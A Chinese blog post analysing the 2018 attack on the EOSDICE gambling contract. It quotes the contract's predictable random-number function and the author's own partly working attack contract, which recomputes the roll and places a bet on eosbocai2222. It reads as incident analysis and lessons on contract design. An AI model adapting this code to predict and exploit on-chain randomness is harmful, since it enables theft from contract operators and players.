内容简介:今天起床看到 EODICE随机数竟然被攻破了?之前我还看过代码,觉得挺安全的,看来我还是太菜了
今天起床看到 EODICE随机数竟然被攻破了?
之前我还看过代码,觉得挺安全的,看来我还是太菜了
随机数代码如下 (来源于 github )
uint8_t random(account_name name, uint64_t game_id) { asset pool_eos = eosio::token(N(eosio.token)).get_balance(_self, symbol_type(S(4, EOS)).name()); auto mixd = tapos_block_prefix() * tapos_block_num() + name + game_id - current_time() + pool_eos.amount; const char *mixedChar = reinterpret_cast<const char *>(&mixd); checksum256 result; sha256((char *)mixedChar, sizeof(mixedChar), &result); uint64_t random_num = *(uint64_t *)(&result.hash[0]) + *(uint64_t *)(&result.hash[8]) + *(uint64_t *)(&result.hash[16]) + *(uint64_t *)(&result.hash[24]); return (uint8_t)(random_num % 100 + 1); }
可以看到生成随机数 有几个特别的东西
- game_id 这个是递增的,可以拿到
- account_name 这个是玩家的用户名,可以拿到
- pool_eos 这个是当前合约的余额,如果短时间没有人玩的话,是可以拿到固定的值的
- tapos_block_prefix & tapos_block_num 这两个是区块内部的值,如果我用合约来攻击的话,可以拿到
- current_time 当前时间戳(合约用了延时交易)
我当时看到这个合约的时候,其实有想过怎么攻击,但是发现变量比较多,应该比较难,攻击合约需要满足以下条件
- 需要短时间内没有人玩,要不然game_id 与 pool_eos都会变动,导致你攻击失败
- 必须要把攻击合约与 出结果 的时间控制在一个区块内,要不然 tapos_block_prefix & tapos_block_num 这两个数会发生改变
- 之前我一直觉得没办法攻击的是 时间,因为合约取的是未来时间的(其实发现了eos 延时合约运行的话,延时多久,时间往后加就行了。。。) 这点要是想明白了,说不定暴富的人就是我了…
我写的一个模拟攻击合约,不知道是不是因为本地测试的原因,tapos_block_prefix & tapos_block_num 一直对不上
其实本来想 直接从合约拿到他的 game_id的,但是一直没有成功…
void charity::hi(uint64_t game_id) { asset pool_eos = eosio::token(N(eosio.token)).get_balance(N(eosbocai2222), symbol_type(S(4, EOS)).name()); pool_eos.amount += 9985; uint64_t t = current_time(); t += 1000000; auto mixd = tapos_block_prefix() * tapos_block_num() + _self + game_id - t + pool_eos.amount; const char *mixedChar = reinterpret_cast<const char *>(&mixd); checksum256 result; sha256((char *)mixedChar, sizeof(mixedChar), &result); uint64_t random_num = *(uint64_t *)(&result.hash[0]) + *(uint64_t *)(&result.hash[8]) + *(uint64_t *)(&result.hash[16]) + *(uint64_t *)(&result.hash[24]); print("random", random_num % 100 + 1); // return (uint8_t)(random_num % 100 + 1); asset payout = asset(10000, S(4, EOS)); action( permission_level{_self, N(active)}, N(eosio.token), N(transfer), std::make_tuple(_self, N(eosbocai2222), payout, std::string("dice-rrr-50-"))) .send(); }
来一张测试截图
可以看到除了 tapos_block_prefix & tapos_block_num 这两个不一样的话,其他的都一样的,
tapos_block_num 应该是每次+1,tapos_block_prefix 不知道生成规则,但是如果在一个区块内,应该是能拿到相同的.
事件回顾
根据官方给出的账号,我找到了黑客的攻击截图
不知道黑客代码怎么写的,他现在已经把合约换掉了…并且吧钱转到了交易所
根据官方所说,他们有对合约自动检测工具,导致被发现疑似黑客事件,立马把钱转走了.
这一点还是值得表扬的,说明团队实力还是有的。(希望可以开源,这样的话,其他的dice被攻击了也不至于损失那么惨)
好像公告发布的也比较早,不知道是不是 自动检测功能能把人call醒(哈哈哈)
总结与反思
当被攻击后,有网友在官方群发了这样的一句话…
让我想起一个笑话
A: 为什么你玩DApp?
B: 因为开源透明代码可见,更公平
A:最近玩什么呢
B:EOS上的菠菜
A:开源了么?
B:没有
我一直觉得 区块链合约肯定要开源,要不然和其他的有啥区别呢?
我个人为啥投了这个游戏呢?是因为这个游戏开源,符合我理想中的区块链游戏,不会发生黑我的情况…
本以为他做大了,能给整个社区起一个带头作用,告诉大家,开源合约也没事情的,区块链游戏就是需要开源!
但是还好,损失不是很大。
最后借用老猫的一张图
本文作者:高金
本文地址: https://igaojin.me/2018/11/04/EODIDEC-随机数被攻破/
版权声明:转载请注明出处!
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。